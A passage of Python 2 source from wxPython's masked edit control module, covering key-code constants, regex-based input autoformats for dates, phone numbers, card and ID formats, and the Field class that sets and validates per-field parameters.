optionally also returns the current contents of that field.
If value is specified, it will retrieve the slice the corresponding
slice from that value, rather than the current value of the
control.
._AdjustField(pos)
This is, the function that gets called for a given position
whenever the cursor is adjusted to leave a given field.
By default, it adjusts the year in date fields if mask is a date,
It can be overridden by a derived class to
adjust the value of the control at that time.
(eg. IpAddrCtrl reformats the address in this way.)
._Change() Called by internal EVT_TEXT handler. Return False to force
skip of the normal class change event.
._Keypress(key) Called by internal EVT_CHAR handler. Return False to force
skip of the normal class keypress event.
._LostFocus() Called by internal EVT_KILL_FOCUS handler
._OnKeyDown(event)
This is the default EVT_KEY_DOWN routine; it just checks for
"navigation keys", and if event.ControlDown(), it fires the
mixin's _OnChar() routine, as such events are not always seen
by the "cooked" EVT_CHAR routine.
._OnChar(event) This is the main EVT_CHAR handler for the
MaskedEditMixin.
The following routines are used to handle standard actions
for control keys:
_OnArrow(event) used for arrow navigation events
_OnCtrl_A(event) 'select all'
_OnCtrl_C(event) 'copy' (uses base control function, as copy is non-destructive)
_OnCtrl_S(event) 'save' (does nothing)
_OnCtrl_V(event) 'paste' - calls _Paste() method, to do smart paste
_OnCtrl_X(event) 'cut' - calls _Cut() method, to "erase" selection
_OnCtrl_Z(event) 'undo' - resets value to previous value (if any)
_OnChangeField(event) primarily used for tab events, but can be
used for other keys (eg. '.' in IpAddrCtrl)
_OnErase(event) used for backspace and delete
_OnHome(event)
_OnEnd(event)
The following routine provides a hook back to any class derivations, so that
they can react to parameter changes before any value is set/reset as a result of
those changes. (eg. masked.ComboBox needs to detect when the choices list is
modified, either implicitly or explicitly, so it can reset the base control
to have the appropriate choice list *before* the initial value is reset to match.)
_OnCtrlParametersChanged()
Accessor Functions
------------------
For convenience, each class derived from MaskedEditMixin should
define an accessors mixin, so that it exposes only those parameters
that make sense for the derivation. This is done with an intermediate
level of inheritance, ie:
class BaseMaskedTextCtrl( TextCtrl, MaskedEditMixin ):
class TextCtrl( BaseMaskedTextCtrl, MaskedEditAccessorsMixin ):
class ComboBox( BaseMaskedComboBox, MaskedEditAccessorsMixin ):
class NumCtrl( BaseMaskedTextCtrl, MaskedNumCtrlAccessorsMixin ):
class IpAddrCtrl( BaseMaskedTextCtrl, IpAddrCtrlAccessorsMixin ):
class TimeCtrl( BaseMaskedTextCtrl, TimeCtrlAccessorsMixin ):
etc.
Each accessors mixin defines Get/Set functions for the base class parameters
that are appropriate for that derivation.
This allows the base classes to be "more generic," exposing the widest
set of options, while not requiring derived classes to be so general.
"""
import copy
import difflib
import re
import string
import types
import wx
# jmg 12/9/03 - when we cut ties with Py 2.2 and earlier, this would
# be a good place to implement the 2.3 logger class
from wx.tools.dbg import Logger
##dbg = Logger()
##dbg(enable=1)
## ---------- ---------- ---------- ---------- ---------- ---------- ----------
## Constants for identifying control keys and classes of keys:
WXK_CTRL_A = (ord('A')+1) - ord('A') ## These keys are not already defined in wx
WXK_CTRL_C = (ord('C')+1) - ord('A')
WXK_CTRL_S = (ord('S')+1) - ord('A')
WXK_CTRL_V = (ord('V')+1) - ord('A')
WXK_CTRL_X = (ord('X')+1) - ord('A')
WXK_CTRL_Z = (ord('Z')+1) - ord('A')
nav = (
wx.WXK_BACK, wx.WXK_LEFT, wx.WXK_RIGHT, wx.WXK_UP, wx.WXK_DOWN, wx.WXK_TAB,
wx.WXK_HOME, wx.WXK_END, wx.WXK_RETURN, wx.WXK_PRIOR, wx.WXK_NEXT,
wx.WXK_NUMPAD_LEFT, wx.WXK_NUMPAD_RIGHT, wx.WXK_NUMPAD_UP, wx.WXK_NUMPAD_DOWN,
wx.WXK_NUMPAD_HOME, wx.WXK_NUMPAD_END, wx.WXK_NUMPAD_ENTER, wx.WXK_NUMPAD_PRIOR, wx.WXK_NUMPAD_NEXT
)
control = (
wx.WXK_BACK, wx.WXK_DELETE, wx.WXK_INSERT,
wx.WXK_NUMPAD_DELETE, wx.WXK_NUMPAD_INSERT,
WXK_CTRL_A, WXK_CTRL_C, WXK_CTRL_S, WXK_CTRL_V,
WXK_CTRL_X, WXK_CTRL_Z
)
# Because unicode can go over the ansi character range, we need to explicitly test
# for all non-visible keystrokes, rather than just assuming a particular range for
# visible characters:
wx_control_keycodes = range(32) + list(nav) + list(control) + [
wx.WXK_START, wx.WXK_LBUTTON, wx.WXK_RBUTTON, wx.WXK_CANCEL, wx.WXK_MBUTTON,
wx.WXK_CLEAR, wx.WXK_SHIFT, wx.WXK_CONTROL, wx.WXK_MENU, wx.WXK_PAUSE,
wx.WXK_CAPITAL, wx.WXK_SELECT, wx.WXK_PRINT, wx.WXK_EXECUTE, wx.WXK_SNAPSHOT,
wx.WXK_HELP, wx.WXK_NUMPAD0, wx.WXK_NUMPAD1, wx.WXK_NUMPAD2, wx.WXK_NUMPAD3,
wx.WXK_NUMPAD4, wx.WXK_NUMPAD5, wx.WXK_NUMPAD6, wx.WXK_NUMPAD7, wx.WXK_NUMPAD8,
wx.WXK_NUMPAD9, wx.WXK_MULTIPLY, wx.WXK_ADD, wx.WXK_SEPARATOR, wx.WXK_SUBTRACT,
wx.WXK_DECIMAL, wx.WXK_DIVIDE, wx.WXK_F1, wx.WXK_F2, wx.WXK_F3, wx.WXK_F4,
wx.WXK_F5, wx.WXK_F6, wx.WXK_F7, wx.WXK_F8, wx.WXK_F9, wx.WXK_F10, wx.WXK_F11,
wx.WXK_F12, wx.WXK_F13, wx.WXK_F14, wx.WXK_F15, wx.WXK_F16, wx.WXK_F17,
wx.WXK_F18, wx.WXK_F19, wx.WXK_F20, wx.WXK_F21, wx.WXK_F22, wx.WXK_F23,
wx.WXK_F24, wx.WXK_NUMLOCK, wx.WXK_SCROLL, wx.WXK_PAGEUP, wx.WXK_PAGEDOWN,
wx.WXK_NUMPAD_SPACE, wx.WXK_NUMPAD_TAB, wx.WXK_NUMPAD_ENTER, wx.WXK_NUMPAD_F1,
wx.WXK_NUMPAD_F2, wx.WXK_NUMPAD_F3, wx.WXK_NUMPAD_F4, wx.WXK_NUMPAD_HOME,
wx.WXK_NUMPAD_LEFT, wx.WXK_NUMPAD_UP, wx.WXK_NUMPAD_RIGHT, wx.WXK_NUMPAD_DOWN,
wx.WXK_NUMPAD_PRIOR, wx.WXK_NUMPAD_PAGEUP, wx.WXK_NUMPAD_NEXT, wx.WXK_NUMPAD_PAGEDOWN,
wx.WXK_NUMPAD_END, wx.WXK_NUMPAD_BEGIN, wx.WXK_NUMPAD_INSERT, wx.WXK_NUMPAD_DELETE,
wx.WXK_NUMPAD_EQUAL, wx.WXK_NUMPAD_MULTIPLY, wx.WXK_NUMPAD_ADD, wx.WXK_NUMPAD_SEPARATOR,
wx.WXK_NUMPAD_SUBTRACT, wx.WXK_NUMPAD_DECIMAL, wx.WXK_NUMPAD_DIVIDE, wx.WXK_WINDOWS_LEFT,
wx.WXK_WINDOWS_RIGHT, wx.WXK_WINDOWS_MENU, wx.WXK_COMMAND,
# Hardware-specific buttons
wx.WXK_SPECIAL1, wx.WXK_SPECIAL2, wx.WXK_SPECIAL3, wx.WXK_SPECIAL4, wx.WXK_SPECIAL5,
wx.WXK_SPECIAL6, wx.WXK_SPECIAL7, wx.WXK_SPECIAL8, wx.WXK_SPECIAL9, wx.WXK_SPECIAL10,
wx.WXK_SPECIAL11, wx.WXK_SPECIAL12, wx.WXK_SPECIAL13, wx.WXK_SPECIAL14, wx.WXK_SPECIAL15,
wx.WXK_SPECIAL16, wx.WXK_SPECIAL17, wx.WXK_SPECIAL18, wx.WXK_SPECIAL19, wx.WXK_SPECIAL20
]
## ---------- ---------- ---------- ---------- ---------- ---------- ----------
## Constants for masking. This is where mask characters
## are defined.
## maskchars used to identify valid mask characters from all others
## # - allow numeric 0-9 only
## A - allow uppercase only. Combine with forceupper to force lowercase to upper
## a - allow lowercase only. Combine with forcelower to force upper to lowercase
## C - allow any letter, upper or lower
## X - allow string.letters, string.punctuation, string.digits
## & - allow string.punctuation only (doesn't include all unicode symbols)
## * - allow any visible character
## Note: locale settings affect what "uppercase", lowercase, etc comprise.
## Note: '|' is not a maskchar, in that it is a mask processing directive, and so
## does not appear here.
##
maskchars = ("#","A","a","X","C","N",'*','&')
ansichars = ""
for i in xrange(32, 256):
ansichars += chr(i)
months = '(01|02|03|04|05|06|07|08|09|10|11|12)'
charmonths = '(Jan|Feb|Mar|Apr|May|Jun|Jul|Aug|Sep|Oct|Nov|Dec|JAN|FEB|MAR|APR|MAY|JUN|JUL|AUG|SEP|OCT|NOV|DEC|jan|feb|mar|apr|may|jun|jul|aug|sep|oct|nov|dec)'
charmonths_dict = {'jan': 1, 'feb': 2, 'mar': 3, 'apr': 4, 'may': 5, 'jun': 6,
'jul': 7, 'aug': 8, 'sep': 9, 'oct': 10, 'nov': 11, 'dec': 12}
days = '(01|02|03|04|05|06|07|08|09|10|11|12|13|14|15|16|17|18|19|20|21|22|23|24|25|26|27|28|29|30|31)'
hours = '(0\d| \d|1[012])'
milhours = '(00|01|02|03|04|05|06|07|08|09|10|11|12|13|14|15|16|17|18|19|20|21|22|23)'
minutes = """(00|01|02|03|04|05|06|07|08|09|10|11|12|13|14|15|\
16|17|18|19|20|21|22|23|24|25|26|27|28|29|30|31|32|33|34|35|\
36|37|38|39|40|41|42|43|44|45|46|47|48|49|50|51|52|53|54|55|\
56|57|58|59)"""
seconds = minutes
am_pm_exclude = 'BCDEFGHIJKLMNOQRSTUVWXYZ\x8a\x8c\x8e\x9f\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd8\xd9\xda\xdb\xdc\xdd\xde'
states = "AL,AK,AZ,AR,CA,CO,CT,DE,DC,FL,GA,GU,HI,ID,IL,IN,IA,KS,KY,LA,MA,ME,MD,MI,MN,MS,MO,MT,NE,NV,NH,NJ,NM,NY,NC,ND,OH,OK,OR,PA,PR,RI,SC,SD,TN,TX,UT,VA,VT,VI,WA,WV,WI,WY".split(',')
state_names = ['Alabama','Alaska','Arizona','Arkansas',
'California','Colorado','Connecticut',
'Delaware','District of Columbia',
'Florida','Georgia','Hawaii',
'Idaho','Illinois','Indiana','Iowa',
'Kansas','Kentucky','Louisiana',
'Maine','Maryland','Massachusetts','Michigan',
'Minnesota','Mississippi','Missouri','Montana',
'Nebraska','Nevada','New Hampshire','New Jersey',
'New Mexico','New York','North Carolina','North Dakokta',
'Ohio','Oklahoma','Oregon',
'Pennsylvania','Puerto Rico','Rhode Island',
'South Carolina','South Dakota',
'Tennessee','Texas','Utah',
'Vermont','Virginia',
'Washington','West Virginia',
'Wisconsin','Wyoming']
## ---------- ---------- ---------- ---------- ---------- ---------- ----------
## The following dictionary defines the current set of autoformats:
masktags = {
"USPHONEFULLEXT": {
'mask': "(###) ###-#### x:###",
'formatcodes': 'F^->',
'validRegex': "^\(\d{3}\) \d{3}-\d{4}",
'description': "Phone Number w/opt. ext"
},
"USPHONETIGHTEXT": {
'mask': "###-###-#### x:###",
'formatcodes': 'F^->',
'validRegex': "^\d{3}-\d{3}-\d{4}",
'description': "Phone Number\n (w/hyphens and opt. ext)"
},
"USPHONEFULL": {
'mask': "(###) ###-####",
'formatcodes': 'F^->',
'validRegex': "^\(\d{3}\) \d{3}-\d{4}",
'description': "Phone Number only"
},
"USPHONETIGHT": {
'mask': "###-###-####",
'formatcodes': 'F^->',
'validRegex': "^\d{3}-\d{3}-\d{4}",
'description': "Phone Number\n(w/hyphens)"
},
"USSTATE": {
'mask': "AA",
'formatcodes': 'F!V',
'validRegex': "([ACDFGHIKLMNOPRSTUVW] |%s)" % string.join(states,'|'),
'choices': states,
'choiceRequired': True,
'description': "US State Code"
},
"USSTATENAME": {
'mask': "ACCCCCCCCCCCCCCCCCCC",
'formatcodes': 'F_',
'validRegex': "([ACDFGHIKLMNOPRSTUVW] |%s)" % string.join(state_names,'|'),
'choices': state_names,
'choiceRequired': True,
'description': "US State Name"
},
"USDATETIMEMMDDYYYY/HHMMSS": {
'mask': "##/##/#### ##:##:## AM",
'excludeChars': am_pm_exclude,
'formatcodes': 'DF!',
'validRegex': '^' + months + '/' + days + '/' + '\d{4} ' + hours + ':' + minutes + ':' + seconds + ' (A|P)M',
'description': "US Date + Time"
},
"USDATETIMEMMDDYYYY-HHMMSS": {
'mask': "##-##-#### ##:##:## AM",
'excludeChars': am_pm_exclude,
'formatcodes': 'DF!',
'validRegex': '^' + months + '-' + days + '-' + '\d{4} ' + hours + ':' + minutes + ':' + seconds + ' (A|P)M',
'description': "US Date + Time\n(w/hypens)"
},
"USDATE24HRTIMEMMDDYYYY/HHMMSS": {
'mask': "##/##/#### ##:##:##",
'formatcodes': 'DF',
'validRegex': '^' + months + '/' + days + '/' + '\d{4} ' + milhours + ':' + minutes + ':' + seconds,
'description': "US Date + 24Hr (Military) Time"
},
"USDATE24HRTIMEMMDDYYYY-HHMMSS": {
'mask': "##-##-#### ##:##:##",
'formatcodes': 'DF',
'validRegex': '^' + months + '-' + days + '-' + '\d{4} ' + milhours + ':' + minutes + ':' + seconds,
'description': "US Date + 24Hr Time\n(w/hypens)"
},
"USDATETIMEMMDDYYYY/HHMM": {
'mask': "##/##/#### ##:## AM",
'excludeChars': am_pm_exclude,
'formatcodes': 'DF!',
'validRegex': '^' + months + '/' + days + '/' + '\d{4} ' + hours + ':' + minutes + ' (A|P)M',
'description': "US Date + Time\n(without seconds)"
},
"USDATE24HRTIMEMMDDYYYY/HHMM": {
'mask': "##/##/#### ##:##",
'formatcodes': 'DF',
'validRegex': '^' + months + '/' + days + '/' + '\d{4} ' + milhours + ':' + minutes,
'description': "US Date + 24Hr Time\n(without seconds)"
},
"USDATETIMEMMDDYYYY-HHMM": {
'mask': "##-##-#### ##:## AM",
'excludeChars': am_pm_exclude,
'formatcodes': 'DF!',
'validRegex': '^' + months + '-' + days + '-' + '\d{4} ' + hours + ':' + minutes + ' (A|P)M',
'description': "US Date + Time\n(w/hypens and w/o secs)"
},
"USDATE24HRTIMEMMDDYYYY-HHMM": {
'mask': "##-##-#### ##:##",
'formatcodes': 'DF',
'validRegex': '^' + months + '-' + days + '-' + '\d{4} ' + milhours + ':' + minutes,
'description': "US Date + 24Hr Time\n(w/hyphens and w/o seconds)"
},
"USDATEMMDDYYYY/": {
'mask': "##/##/####",
'formatcodes': 'DF',
'validRegex': '^' + months + '/' + days + '/' + '\d{4}',
'description': "US Date\n(MMDDYYYY)"
},
"USDATEMMDDYY/": {
'mask': "##/##/##",
'formatcodes': 'DF',
'validRegex': '^' + months + '/' + days + '/\d\d',
'description': "US Date\n(MMDDYY)"
},
"USDATEMMDDYYYY-": {
'mask': "##-##-####",
'formatcodes': 'DF',
'validRegex': '^' + months + '-' + days + '-' +'\d{4}',
'description': "MM-DD-YYYY"
},
"EUDATEYYYYMMDD/": {
'mask': "####/##/##",
'formatcodes': 'DF',
'validRegex': '^' + '\d{4}'+ '/' + months + '/' + days,
'description': "YYYY/MM/DD"
},
"EUDATEYYYYMMDD.": {
'mask': "####.##.##",
'formatcodes': 'DF',
'validRegex': '^' + '\d{4}'+ '.' + months + '.' + days,
'description': "YYYY.MM.DD"
},
"EUDATEDDMMYYYY/": {
'mask': "##/##/####",
'formatcodes': 'DF',
'validRegex': '^' + days + '/' + months + '/' + '\d{4}',
'description': "DD/MM/YYYY"
},
"EUDATEDDMMYYYY.": {
'mask': "##.##.####",
'formatcodes': 'DF',
'validRegex': '^' + days + '.' + months + '.' + '\d{4}',
'description': "DD.MM.YYYY"
},
"EUDATEDDMMMYYYY.": {
'mask': "##.CCC.####",
'formatcodes': 'DF',
'validRegex': '^' + days + '.' + charmonths + '.' + '\d{4}',
'description': "DD.Month.YYYY"
},
"EUDATEDDMMMYYYY/": {
'mask': "##/CCC/####",
'formatcodes': 'DF',
'validRegex': '^' + days + '/' + charmonths + '/' + '\d{4}',
'description': "DD/Month/YYYY"
},
"EUDATETIMEYYYYMMDD/HHMMSS": {
'mask': "####/##/## ##:##:## AM",
'excludeChars': am_pm_exclude,
'formatcodes': 'DF!',
'validRegex': '^' + '\d{4}'+ '/' + months + '/' + days + ' ' + hours + ':' + minutes + ':' + seconds + ' (A|P)M',
'description': "YYYY/MM/DD HH:MM:SS"
},
"EUDATETIMEYYYYMMDD.HHMMSS": {
'mask': "####.##.## ##:##:## AM",
'excludeChars': am_pm_exclude,
'formatcodes': 'DF!',
'validRegex': '^' + '\d{4}'+ '.' + months + '.' + days + ' ' + hours + ':' + minutes + ':' + seconds + ' (A|P)M',
'description': "YYYY.MM.DD HH:MM:SS"
},
"EUDATETIMEDDMMYYYY/HHMMSS": {
'mask': "##/##/#### ##:##:## AM",
'excludeChars': am_pm_exclude,
'formatcodes': 'DF!',
'validRegex': '^' + days + '/' + months + '/' + '\d{4} ' + hours + ':' + minutes + ':' + seconds + ' (A|P)M',
'description': "DD/MM/YYYY HH:MM:SS"
},
"EUDATETIMEDDMMYYYY.HHMMSS": {
'mask': "##.##.#### ##:##:## AM",
'excludeChars': am_pm_exclude,
'formatcodes': 'DF!',
'validRegex': '^' + days + '.' + months + '.' + '\d{4} ' + hours + ':' + minutes + ':' + seconds + ' (A|P)M',
'description': "DD.MM.YYYY HH:MM:SS"
},
"EUDATETIMEYYYYMMDD/HHMM": {
'mask': "####/##/## ##:## AM",
'excludeChars': am_pm_exclude,
'formatcodes': 'DF!',
'validRegex': '^' + '\d{4}'+ '/' + months + '/' + days + ' ' + hours + ':' + minutes + ' (A|P)M',
'description': "YYYY/MM/DD HH:MM"
},
"EUDATETIMEYYYYMMDD.HHMM": {
'mask': "####.##.## ##:## AM",
'excludeChars': am_pm_exclude,
'formatcodes': 'DF!',
'validRegex': '^' + '\d{4}'+ '.' + months + '.' + days + ' ' + hours + ':' + minutes + ' (A|P)M',
'description': "YYYY.MM.DD HH:MM"
},
"EUDATETIMEDDMMYYYY/HHMM": {
'mask': "##/##/#### ##:## AM",
'excludeChars': am_pm_exclude,
'formatcodes': 'DF!',
'validRegex': '^' + days + '/' + months + '/' + '\d{4} ' + hours + ':' + minutes + ' (A|P)M',
'description': "DD/MM/YYYY HH:MM"
},
"EUDATETIMEDDMMYYYY.HHMM": {
'mask': "##.##.#### ##:## AM",
'excludeChars': am_pm_exclude,
'formatcodes': 'DF!',
'validRegex': '^' + days + '.' + months + '.' + '\d{4} ' + hours + ':' + minutes + ' (A|P)M',
'description': "DD.MM.YYYY HH:MM"
},
"EUDATE24HRTIMEYYYYMMDD/HHMMSS": {
'mask': "####/##/## ##:##:##",
'formatcodes': 'DF',
'validRegex': '^' + '\d{4}'+ '/' + months + '/' + days + ' ' + milhours + ':' + minutes + ':' + seconds,
'description': "YYYY/MM/DD 24Hr Time"
},
"EUDATE24HRTIMEYYYYMMDD.HHMMSS": {
'mask': "####.##.## ##:##:##",
'formatcodes': 'DF',
'validRegex': '^' + '\d{4}'+ '.' + months + '.' + days + ' ' + milhours + ':' + minutes + ':' + seconds,
'description': "YYYY.MM.DD 24Hr Time"
},
"EUDATE24HRTIMEDDMMYYYY/HHMMSS": {
'mask': "##/##/#### ##:##:##",
'formatcodes': 'DF',
'validRegex': '^' + days + '/' + months + '/' + '\d{4} ' + milhours + ':' + minutes + ':' + seconds,
'description': "DD/MM/YYYY 24Hr Time"
},
"EUDATE24HRTIMEDDMMYYYY.HHMMSS": {
'mask': "##.##.#### ##:##:##",
'formatcodes': 'DF',
'validRegex': '^' + days + '.' + months + '.' + '\d{4} ' + milhours + ':' + minutes + ':' + seconds,
'description': "DD.MM.YYYY 24Hr Time"
},
"EUDATE24HRTIMEYYYYMMDD/HHMM": {
'mask': "####/##/## ##:##",
'formatcodes': 'DF','validRegex': '^' + '\d{4}'+ '/' + months + '/' + days + ' ' + milhours + ':' + minutes,
'description': "YYYY/MM/DD 24Hr Time\n(w/o seconds)"
},
"EUDATE24HRTIMEYYYYMMDD.HHMM": {
'mask': "####.##.## ##:##",
'formatcodes': 'DF',
'validRegex': '^' + '\d{4}'+ '.' + months + '.' + days + ' ' + milhours + ':' + minutes,
'description': "YYYY.MM.DD 24Hr Time\n(w/o seconds)"
},
"EUDATE24HRTIMEDDMMYYYY/HHMM": {
'mask': "##/##/#### ##:##",
'formatcodes': 'DF',
'validRegex': '^' + days + '/' + months + '/' + '\d{4} ' + milhours + ':' + minutes,
'description': "DD/MM/YYYY 24Hr Time\n(w/o seconds)"
},
"EUDATE24HRTIMEDDMMYYYY.HHMM": {
'mask': "##.##.#### ##:##",
'formatcodes': 'DF',
'validRegex': '^' + days + '.' + months + '.' + '\d{4} ' + milhours + ':' + minutes,
'description': "DD.MM.YYYY 24Hr Time\n(w/o seconds)"
},
"TIMEHHMMSS": {
'mask': "##:##:## AM",
'excludeChars': am_pm_exclude,
'formatcodes': 'TF!',
'validRegex': '^' + hours + ':' + minutes + ':' + seconds + ' (A|P)M',
'description': "HH:MM:SS (A|P)M\n(see TimeCtrl)"
},
"TIMEHHMM": {
'mask': "##:## AM",
'excludeChars': am_pm_exclude,
'formatcodes': 'TF!',
'validRegex': '^' + hours + ':' + minutes + ' (A|P)M',
'description': "HH:MM (A|P)M\n(see TimeCtrl)"
},
"24HRTIMEHHMMSS": {
'mask': "##:##:##",
'formatcodes': 'TF',
'validRegex': '^' + milhours + ':' + minutes + ':' + seconds,
'description': "24Hr HH:MM:SS\n(see TimeCtrl)"
},
"24HRTIMEHHMM": {
'mask': "##:##",
'formatcodes': 'TF',
'validRegex': '^' + milhours + ':' + minutes,
'description': "24Hr HH:MM\n(see TimeCtrl)"
},
"USSOCIALSEC": {
'mask': "###-##-####",
'formatcodes': 'F',
'validRegex': "\d{3}-\d{2}-\d{4}",
'description': "Social Sec#"
},
"CREDITCARD": {
'mask': "####-####-####-####",
'formatcodes': 'F',
'validRegex': "\d{4}-\d{4}-\d{4}-\d{4}",
'description': "Credit Card"
},
"EXPDATEMMYY": {
'mask': "##/##",
'formatcodes': "F",
'validRegex': "^" + months + "/\d\d",
'description': "Expiration MM/YY"
},
"USZIP": {
'mask': "#####",
'formatcodes': 'F',
'validRegex': "^\d{5}",
'description': "US 5-digit zip code"
},
"USZIPPLUS4": {
'mask': "#####-####",
'formatcodes': 'F',
'validRegex': "\d{5}-(\s{4}|\d{4})",
'description': "US zip+4 code"
},
"PERCENT": {
'mask': "0.##",
'formatcodes': 'F',
'validRegex': "^0.\d\d",
'description': "Percentage"
},
"AGE": {
'mask': "###",
'formatcodes': "F",
'validRegex': "^[1-9]{1} |[1-9][0-9] |1[0|1|2][0-9]",
'description': "Age"
},
"EMAIL": {
'mask': "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX",
'excludeChars': " \\/*&%$#!+='\"",
'formatcodes': "F>",
'validRegex': "^\w+([\-\.]\w+)*@((([a-zA-Z0-9]+(\-[a-zA-Z0-9]+)*\.)+)[a-zA-Z]{2,4}|\[(\d|\d\d|(1\d\d|2[0-4]\d|25[0-5]))(\.(\d|\d\d|(1\d\d|2[0-4]\d|25[0-5]))){3}\]) *$",
'description': "Email address"
},
"IPADDR": {
'mask': "###.###.###.###",
'formatcodes': 'F_Sr',
'validRegex': "( \d| \d\d|(1\d\d|2[0-4]\d|25[0-5]))(\.( \d| \d\d|(1\d\d|2[0-4]\d|25[0-5]))){3}",
'description': "IP Address\n(see IpAddrCtrl)"
}
}
# build demo-friendly dictionary of descriptions of autoformats
autoformats = []
for key, value in masktags.items():
autoformats.append((key, value['description']))
autoformats.sort()
## ---------- ---------- ---------- ---------- ---------- ---------- ----------
class Field:
"""
This class manages the individual fields in a masked edit control.
Each field has a zero-based index, indicating its position in the
control, an extent, an associated mask, and a plethora of optional
parameters. Fields can be instantiated and then associated with
parent masked controls, in order to provide field-specific configuration.
Alternatively, fields will be implicitly created by the parent control
if not provided at construction, at which point, the fields can then
manipulated by the controls .SetFieldParameters() method.
"""
valid_params = {
'index': None, ## which field of mask; set by parent control.
'mask': "", ## mask chars for this field
'extent': (), ## (edit start, edit_end) of field; set by parent control.
'formatcodes': "", ## codes indicating formatting options for the control
'fillChar': ' ', ## used as initial value for each mask position if initial value is not given
'groupChar': ',', ## used with numeric fields; indicates what char groups 3-tuple digits
'decimalChar': '.', ## used with numeric fields; indicates what char separates integer from fraction
'shiftDecimalChar': '>', ## used with numeric fields, indicates what is above the decimal point char on keyboard
'useParensForNegatives': False, ## used with numeric fields, indicates that () should be used vs. - to show negative numbers.
'defaultValue': "", ## use if you want different positional defaults vs. all the same fillChar
'excludeChars': "", ## optional string of chars to exclude even if main mask type does
'includeChars': "", ## optional string of chars to allow even if main mask type doesn't
'validRegex': "", ## optional regular expression to use to validate the control
'validRange': (), ## Optional hi-low range for numerics
'choices': [], ## Optional list for character expressions
'choiceRequired': False, ## If choices supplied this specifies if valid value must be in the list
'compareNoCase': False, ## Optional flag to indicate whether or not to use case-insensitive list search
'autoSelect': False, ## Set to True to try auto-completion on each keystroke:
'validFunc': None, ## Optional function for defining additional, possibly dynamic validation constraints on contrl
'validRequired': False, ## Set to True to disallow input that results in an invalid value
'emptyInvalid': False, ## Set to True to make EMPTY = INVALID
'description': "", ## primarily for autoformats, but could be useful elsewhere
'raiseOnInvalidPaste': False, ## if True, paste into field will cause ValueError
'stopFieldChangeIfInvalid': False,## if True, disallow field navigation out of invalid field
}
# This list contains all parameters that when set at the control level should
# propagate down to each field:
propagating_params = ('fillChar', 'groupChar', 'decimalChar','useParensForNegatives',
'compareNoCase', 'emptyInvalid', 'validRequired', 'raiseOnInvalidPaste',
'stopFieldChangeIfInvalid')
def __init__(self, **kwargs):
"""
This is the "constructor" for setting up parameters for fields.
a field_index of -1 is used to indicate "the entire control."
"""
#### dbg('Field::Field', indent=1)
# Validate legitimate set of parameters:
for key in kwargs.keys():
if key not in Field.valid_params.keys():
#### dbg(indent=0)
ae = AttributeError('invalid parameter "%s"' % (key))
ae.attribute = key
raise ae
# Set defaults for each parameter for this instance, and fully
# populate initial parameter list for configuration:
for key, value in Field.valid_params.items():
setattr(self, '_' + key, copy.copy(value))
if not kwargs.has_key(key):
kwargs[key] = copy.copy(value)
self._autoCompleteIndex = -1
self._SetParameters(**kwargs)
self._ValidateParameters(**kwargs)
#### dbg(indent=0)
def _SetParameters(self, **kwargs):
"""
This function can be used to set individual or multiple parameters for
a masked edit field parameter after construction.
"""
## dbg(suspend=1)
## dbg('maskededit.Field::_SetParameters', indent=1)
# Validate keyword arguments:
for key in kwargs.keys():
if key not in Field.valid_params.keys():
## dbg(indent=0, suspend=0)
ae = AttributeError('invalid keyword argument "%s"' % key)
ae.attribute = key
raise ae
## if self._index is not None: dbg('field index:', self._index)
## dbg('parameters:', indent=1)
for key, value in kwargs.items():
## dbg('%s:' % key, value)
pass
## dbg(indent=0)
old_fillChar = self._fillChar # store so we can change choice lists accordingly if it changes
# First, Assign all parameters specified:
for key in Field.valid_params.keys():
if kwargs.has_key(key):
setattr(self, '_' + key, kwargs[key] )
if kwargs.has_key('formatcodes'): # (set/changed)
self._forceupper = '!' in self._formatcodes
self._forcelower = '^' in self._formatcodes
self._groupdigits = ',' in self._formatcodes
self._okSpaces = '_' in self._formatcodes
self._padZero = '0' in self._formatcodes
self._autofit = 'F' in self._formatcodes
self._insertRight = 'r' in self._formatcodes
self._allowInsert = '>' in self._formatcodes
self._alignRight = 'R' in self._formatcodes or 'r' in self._formatcodes
self._moveOnFieldFull = not '<' in self._formatcodes
self._selectOnFieldEntry = 'S' in self._formatcodes
if kwargs.has_key('groupChar'):
self._groupChar = kwargs['groupChar']
if kwargs.has_key('decimalChar'):
self._decimalChar = kwargs['decimalChar']
if kwargs.has_key('shiftDecimalChar'):
self._shiftDecimalChar = kwargs['shiftDecimalChar']
if kwargs.has_key('formatcodes') or kwargs.has_key('validRegex'):
self._regexMask = 'V' in self._formatcodes and self._validRegex
if kwargs.has_key('fillChar'):
self._old_fillChar = old_fillChar
#### dbg("self._old_fillChar: '%s'" % self._old_fillChar)
if kwargs.has_key('mask') or kwargs.has_key('validRegex'): # (set/changed)
self._isInt = _isInteger(self._mask)
## dbg('isInt?', self._isInt, 'self._mask:"%s"' % self._mask)
## dbg(indent=0, suspend=0)
def _ValidateParameters(self, **kwargs):
"""
This function can be used to validate individual or multiple parameters for
a masked edit field parameter after construction.
"""
## dbg(suspend=1)
## dbg('maskededit.Field::_ValidateParameters', indent=1)
## if self._index is not None: dbg('field index:', self._index)
#### dbg('parameters:', indent=1)
## for key, value in kwargs.items():
#### dbg('%s:' % key, value)
#### dbg(indent=0)
#### dbg("self._old_fillChar: '%s'" % self._old_fillChar)
# Verify proper numeric format params:
if self._groupdigits and self._groupChar == self._decimalChar:
## dbg(indent=0, suspend=0)
ae = AttributeError("groupChar '%s' cannot be the same as decimalChar '%s'" % (self._groupChar, self._decimalChar))
ae.attribute = self._groupChar
raise ae
# Now go do validation, semantic and inter-dependency parameter processing:
if kwargs.has_key('choices') or kwargs.has_key('compareNoCase') or kwargs.has_key('choiceRequired'): # (set/changed)
self._compareChoices = [choice.strip() for choice in self._choices]
if self._compareNoCase and self._choices:
self._compareChoices = [item.lower() for item in self._compareChoices]
if kwargs.has_key('choices'):
self._autoCompleteIndex = -1
if kwargs.has_key('validRegex'): # (set/changed)
if self._validRegex:
try:
if self._compareNoCase:
self._filter = re.compile(self._validRegex, re.IGNORECASE)
else:
self._filter = re.compile(self._validRegex)
except:
## dbg(indent=0, suspend=0)
raise TypeError('%s: validRegex "%s" not a legal regular expression' % (str(self._index), self._validRegex))
else:
self._filter = None
if kwargs.has_key('validRange'): # (set/changed)
self._hasRange = False
self._rangeHigh = 0
self._rangeLow = 0
if self._validRange:
